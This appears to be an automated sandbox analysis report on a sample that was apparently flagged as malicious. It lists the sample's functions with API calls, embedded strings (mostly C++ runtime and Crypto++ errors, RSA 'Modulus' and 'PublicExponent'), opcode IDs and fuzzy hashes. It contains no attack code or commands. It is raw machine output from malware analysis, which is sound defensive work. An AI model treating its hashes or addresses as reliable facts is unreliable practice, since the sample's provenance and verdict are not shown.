                                                                                          • Instruction Fuzzy Hash: E4519F70D08249EFEB10CFA4D940BDEBBB4BF55304F108198D94967381DB716A49CFA2
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D036A34
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw
                                                                                          • String ID: : this object does't support a special last block$tm
                                                                                          • API String ID: 2005118841-806234092
                                                                                          • Opcode ID: 74827ac2825510f8c19be5c1db895d6c18af6f07f8e8e3881e50c9c68bf7e65c
                                                                                          • Instruction ID: f2be7bcd0817b95b2d436e029a878beca1712ade800ae516308579c807f49f26
                                                                                          • Opcode Fuzzy Hash: 74827ac2825510f8c19be5c1db895d6c18af6f07f8e8e3881e50c9c68bf7e65c
                                                                                          • Instruction Fuzzy Hash: 82414A752087809FD314CF28C880B5BBBE8FF9D614F508A1DF59997391EB30A9048B92
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D004175
                                                                                          • _memmove.LIBCMT ref: 6D0041C6
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                          • String ID: string too long
                                                                                          • API String ID: 2168136238-2556327735
                                                                                          • Opcode ID: 9404d0726d62118caa4498dd45808aa12ab4d028ae6d90b6f7694a033312cb6f
                                                                                          • Instruction ID: 656c76449c483ae8e08bb19fdcd7de91b1e519846356e60434797b5d4549ece7
                                                                                          • Opcode Fuzzy Hash: 9404d0726d62118caa4498dd45808aa12ab4d028ae6d90b6f7694a033312cb6f
                                                                                          • Instruction Fuzzy Hash: 2431A1323146107BF7219E5CEC80BAAF7EDEBBD764B60492BE591C7680C761DC4087A5
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D03C39B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw
                                                                                          • String ID: gfff$gfff
                                                                                          • API String ID: 2005118841-3084402119
                                                                                          • Opcode ID: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
                                                                                          • Instruction ID: 73cd85e0fa9861f4fe6e75c44169765f62f9e30141db5f7cfee3e39de0dbeb05
                                                                                          • Opcode Fuzzy Hash: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
                                                                                          • Instruction Fuzzy Hash: 6C31727190461EAFD714CF98D980FBEB7B9EB84318F45811CE915D7284D730BA15CBA1
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D00194F
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          • std::exception::exception.LIBCMT ref: 6D00198E
                                                                                            • Part of subcall function 6D0695C1: std::exception::operator=.LIBCMT ref: 6D0695DA
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D004067
                                                                                            • Part of subcall function 6D004010: _memmove.LIBCMT ref: 6D0040C8
                                                                                          Strings
                                                                                          • Clone() is not implemented yet., xrefs: 6D0018ED
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
                                                                                          • String ID: Clone() is not implemented yet.
                                                                                          • API String ID: 2192554526-226299721
                                                                                          • Opcode ID: 1c274e7e1a0ca3e80b27e97f25e1c09a2aabc0c543375a6b5df3308536694209
                                                                                          • Instruction ID: c9bb8c1f2cd63e7f7ed37f368507cd175464446b7dacec73de8d51d987154c15
                                                                                          • Opcode Fuzzy Hash: 1c274e7e1a0ca3e80b27e97f25e1c09a2aabc0c543375a6b5df3308536694209
                                                                                          • Instruction Fuzzy Hash: 8B316071808248BFEB14CF99D840BEEFFB8FB19324F10462EE525A7681D7749504CBA0
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D035657
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Strings
                                                                                          • InputBuffer, xrefs: 6D0355BF
                                                                                          • StringStore: missing InputBuffer argument, xrefs: 6D0355E0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                                          • String ID: InputBuffer$StringStore: missing InputBuffer argument
                                                                                          • API String ID: 3718517217-2380213735
                                                                                          • Opcode ID: 1c156294a26ef270050afd17303d8ea0bc0d459e24c9b5cb5c937717f1d296eb
                                                                                          • Instruction ID: 789829f8d3224bb055b0a954c4723ccaf195d378e5885221bc07b9894c2308eb
                                                                                          • Opcode Fuzzy Hash: 1c156294a26ef270050afd17303d8ea0bc0d459e24c9b5cb5c937717f1d296eb
                                                                                          • Instruction Fuzzy Hash: 8F4135B150C7819FE320CF69D490B6BFBE4BB99714F448A1EF1A983291DB74D908CB52
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D001F36
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          • std::exception::exception.LIBCMT ref: 6D001F6E
                                                                                            • Part of subcall function 6D0695C1: std::exception::operator=.LIBCMT ref: 6D0695DA
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D004067
                                                                                            • Part of subcall function 6D004010: _memmove.LIBCMT ref: 6D0040C8
                                                                                          Strings
                                                                                          • CryptoMaterial: this object does not support precomputation, xrefs: 6D001ED4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
                                                                                          • String ID: CryptoMaterial: this object does not support precomputation
                                                                                          • API String ID: 2192554526-3625584042
                                                                                          • Opcode ID: 9054cbca20ef34eea77345b4114b2d45cf01f89d308d54dfe61abc7fa98ec06a
                                                                                          • Instruction ID: 885848ff15bf8199b161f46a220775406715c9b98d026d45635633b39dce4733
                                                                                          • Opcode Fuzzy Hash: 9054cbca20ef34eea77345b4114b2d45cf01f89d308d54dfe61abc7fa98ec06a
                                                                                          • Instruction Fuzzy Hash: 28316F71808248BFEB14CF99D840BAEFBB8FB09724F10866EE525A7781D7749504CB90
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D013327
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D01336B
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throwstd::exception::exception$ExceptionRaiseXinvalid_argumentstd::_
                                                                                          • String ID: vector<T> too long
                                                                                          • API String ID: 1735018483-3788999226
                                                                                          • Opcode ID: 696eed7e7b2e6e9031cb5d557ef62004cb543bee8df2f833d121a9123d02d910
                                                                                          • Instruction ID: 3a6c988cf344e73ad1c1545e1cd5353f9de99fd5f71fdf7c627ded1c89c32564
                                                                                          • Opcode Fuzzy Hash: 696eed7e7b2e6e9031cb5d557ef62004cb543bee8df2f833d121a9123d02d910
                                                                                          • Instruction Fuzzy Hash: D4310579A086059FEB14CF98DC90B6EB3B0EB49314F16422DE9169B391DB31BD00CB95
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D02584D
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • VariantClear.OLEAUT32(00000000), ref: 6D025899
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$ClearException@8ThrowVariantXinvalid_argumentstd::_
                                                                                          • String ID: vector<T> too long
                                                                                          • API String ID: 2677079660-3788999226
                                                                                          • Opcode ID: 6a82736dfedbeec5f7a9d275d3c1aacce61277f70d75291ea2c46d6b4311e746
                                                                                          • Instruction ID: f2f322657a4b962cb5a10487ff5c014dd09517ecdde272673b47bbe358222da0
                                                                                          • Opcode Fuzzy Hash: 6a82736dfedbeec5f7a9d275d3c1aacce61277f70d75291ea2c46d6b4311e746
                                                                                          • Instruction Fuzzy Hash: 6B21B676A056059FE710CF68D884B7EB7F5FF48324F51462EE555E3780D770A9008B91
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D01576B
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D015782
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                          • String ID: string too long
                                                                                          • API String ID: 963545896-2556327735
                                                                                          • Opcode ID: abcd262a5cdf386b19d1a2d7d4fda6ebdb36fc0b52e2c13ff89a8461428aaef6
                                                                                          • Instruction ID: 778b49e9de5e6b10f4efb50af933ca3223f40912d5464f27bd98713fe8b949ed
                                                                                          • Opcode Fuzzy Hash: abcd262a5cdf386b19d1a2d7d4fda6ebdb36fc0b52e2c13ff89a8461428aaef6
                                                                                          • Instruction Fuzzy Hash: 4411A53630C6119FF3219A9CBC81B7AF7FDEF95620B61071FE5528B681C761980483A1
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D0046C4
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D00470B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: string too long
                                                                                          • API String ID: 1785806476-2556327735
                                                                                          • Opcode ID: 7eb88d3f9407c8e85400fc190aab2e360e3626699466c2c05db926a7217ab742
                                                                                          • Instruction ID: 75d34ae6809d9585cf6a9f106e4d025b3b136b39063f5612fef4a1ce3a23f471
                                                                                          • Opcode Fuzzy Hash: 7eb88d3f9407c8e85400fc190aab2e360e3626699466c2c05db926a7217ab742
                                                                                          • Instruction Fuzzy Hash: F411B9761087117FF7209E78A8C0B7EB7A8AF69214F200A2ED59B83582D761E4488365
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D034E00
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Strings
                                                                                          • ArraySink: missing OutputBuffer argument, xrefs: 6D034D91
                                                                                          • OutputBuffer, xrefs: 6D034D77
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                                          • String ID: ArraySink: missing OutputBuffer argument$OutputBuffer
                                                                                          • API String ID: 3718517217-3781944848
                                                                                          • Opcode ID: 528d7883aebf50bc285db52d975b3a444c5224586b885279d1502eff788764a9
                                                                                          • Instruction ID: 812609c1e8fb29648db4c8ac02c316a48cb50c58e84667757c66f20a74c9df2c
                                                                                          • Opcode Fuzzy Hash: 528d7883aebf50bc285db52d975b3a444c5224586b885279d1502eff788764a9
                                                                                          • Instruction Fuzzy Hash: 273105B550C780AFE310CF68C480B5AFBE4BB99714F408A1EF5A987391DB74D508CB52
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D010201
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Strings
                                                                                          • StringSink: OutputStringPointer not specified, xrefs: 6D01019B
                                                                                          • OutputStringPointer, xrefs: 6D01018C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                                          • String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
                                                                                          • API String ID: 3718517217-1331214609
                                                                                          • Opcode ID: 7b884588275828c81e8d01c07ddc559fd4b34413a6a5bfca5ab71342d7fd8c24
                                                                                          • Instruction ID: ccbdcd3872b5b04420de896644469cc46cbd489eb4c66f8c88431378565468d4
                                                                                          • Opcode Fuzzy Hash: 7b884588275828c81e8d01c07ddc559fd4b34413a6a5bfca5ab71342d7fd8c24
                                                                                          • Instruction Fuzzy Hash: 5A215071D08288BFEB04DFE8D890BEDFBB4EF09314F10825AE525A7682DB359504CB50
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D004636
                                                                                            • Part of subcall function 6D069125: std::exception::exception.LIBCMT ref: 6D06913A
                                                                                            • Part of subcall function 6D069125: __CxxThrowException@8.LIBCMT ref: 6D06914F
                                                                                            • Part of subcall function 6D069125: std::exception::exception.LIBCMT ref: 6D069160
                                                                                          • _memmove.LIBCMT ref: 6D00466F
                                                                                          Strings
                                                                                          • invalid string position, xrefs: 6D004631
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: invalid string position
                                                                                          • API String ID: 1785806476-1799206989
                                                                                          • Opcode ID: 51808daab5c06ccc1be0bf7380f14eed62430425366f0f41f443278f2c287917
                                                                                          • Instruction ID: c5a70eb61a036b25d6123a2d36a93b6ba9753740379534de1e79ae974850bfc7
                                                                                          • Opcode Fuzzy Hash: 51808daab5c06ccc1be0bf7380f14eed62430425366f0f41f443278f2c287917
                                                                                          • Instruction Fuzzy Hash: 3101DF3130474077F3218E5CEC80B1AB7EDEBED614B25491DD195CB701E6B1DC4183A6
                                                                                          APIs
                                                                                          • type_info::operator!=.LIBCMT ref: 6D03ACF8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: type_info::operator!=
                                                                                          • String ID: Modulus$PublicExponent
                                                                                          • API String ID: 2241493438-3324115277
                                                                                          • Opcode ID: fe4131dab3a25e6f48b206c88e4a47dd116e5cdeef545706cb4090d92335ab12
                                                                                          • Instruction ID: 334deba7b938e658c00930b605803f589dcf409b51ab63a006d7dedd084f4917
                                                                                          • Opcode Fuzzy Hash: fe4131dab3a25e6f48b206c88e4a47dd116e5cdeef545706cb4090d92335ab12
                                                                                          • Instruction Fuzzy Hash: 7A11E0309193169FDA00DF6C8844A5BFBE4FFD6248F12461EF9859B261DB30D848CB92
                                                                                          APIs
                                                                                          • type_info::operator!=.LIBCMT ref: 6D05B848
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: type_info::operator!=
                                                                                          • String ID: Modulus$PublicExponent
                                                                                          • API String ID: 2241493438-3324115277
                                                                                          • Opcode ID: 16d683e13dcdf9cae4cde99377b6174a24511bdc77f117092ba949d1be8801f8
                                                                                          • Instruction ID: a9eda9ddd2bdf3d976f149b38432605e8d97b3d98d034032669c23c085081dac
                                                                                          • Opcode Fuzzy Hash: 16d683e13dcdf9cae4cde99377b6174a24511bdc77f117092ba949d1be8801f8
                                                                                          • Instruction Fuzzy Hash: 3E11E370909345AED700DF28994076BFBE4EFD5244F01066EF9845B291DB30E848CBA6
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D03B605
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D03B634
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
